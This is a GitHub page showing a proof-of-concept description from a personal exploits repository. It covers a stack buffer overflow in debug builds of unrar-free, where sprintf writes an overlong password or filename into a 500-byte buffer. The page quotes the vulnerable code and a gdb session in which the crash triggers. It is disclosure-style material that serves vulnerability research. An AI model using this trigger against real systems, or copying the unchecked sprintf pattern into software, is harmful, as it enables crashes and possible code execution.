Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
my-exploits/pocs/unrar-free/buffer-overflow/DESCRIPTION
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
64 lines (46 sloc)
2.37 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| unrar-free suffers from a stack overflow vulnerability because of a fixed size buffer when compiled with debug options. | |
| unrar-lib.c | |
| ........ LINE 42 | |
| #define _DEBUG_LOG 1 | |
| #ifdef _DEBUG_LOG /* define macros for debugging */ | |
| .......... | |
| A fixed size buffer is allocated for the DebugMsg | |
| #ifdef _DEBUG_LOG | |
| char DebugMsg[500]; /* used to compose debug msg */ | |
| #endif | |
| ........ | |
| The sprintf function will format the string with our controlled input and if the size is more then 500 there will happen a stack overflow | |
| #ifdef _DEBUG_LOG | |
| sprintf (DebugMsg, "Extracting \"%s\" from \"%s\" (password is \"%s\")...", filename, (char *) rarfile, libpassword ? libpassword : ""); | |
| debug_log (DebugMsg); | |
| #endif | |
| ........ | |
| There are multiple ways to trigger the stack overflow like from the filename (there is a limit of 255 chars because of the file system) , path and the more relaible | |
| is from the password input. | |
| gdb-peda$ run | |
| Starting program: /usr/local/bin/unrar -x archive.rar -p | |
| Password: INPUT HERE A STRING LARGER THEN 500 | |
| unrar 0.0.1 Copyright (C) 2004 Ben Asselstine, Jeroen Dekkers | |
| Extracting from /home/fuzzer/fuzz-sessions/rar/i/archive.rar | |
| file header broken | |
| *** buffer overflow detected ***: /usr/local/bin/unrar terminated | |
| ======= Backtrace: ========= | |
| /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff7a847e5] | |
| /lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7ffff7b2611c] | |
| /lib/x86_64-linux-gnu/libc.so.6(+0x117120)[0x7ffff7b24120] | |
| /lib/x86_64-linux-gnu/libc.so.6(+0x116689)[0x7ffff7b23689] | |
| /lib/x86_64-linux-gnu/libc.so.6(_IO_default_xsputn+0x80)[0x7ffff7a886b0] | |
| /lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0x139b)[0x7ffff7a5b50b] | |
| /lib/x86_64-linux-gnu/libc.so.6(__vsprintf_chk+0x84)[0x7ffff7b23714] | |
| /lib/x86_64-linux-gnu/libc.so.6(__sprintf_chk+0x7d)[0x7ffff7b2366d] | |
| /usr/local/bin/unrar[0x40f6cd] | |
| /usr/local/bin/unrar[0x404f47] | |
| /usr/local/bin/unrar[0x406383] | |
| /usr/local/bin/unrar[0x401f57] | |
| /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff7a2d830] | |
| /usr/local/bin/unrar[0x401f89] | |
| ======= Memory map: ======== | |
| 00400000-00413000 r-xp 00000000 fc:00 13209 /usr/local/bin/unrar | |
| 00612000-00613000 r--p 00012000 fc:00 13209 /usr/local/bin/unrar | |
| 00613000-00614000 rw-p 00013000 fc:00 13209 /usr/local/bin/unrar | |
| 00614000-0063a000 rw-p 00000000 00:00 0 [heap] | |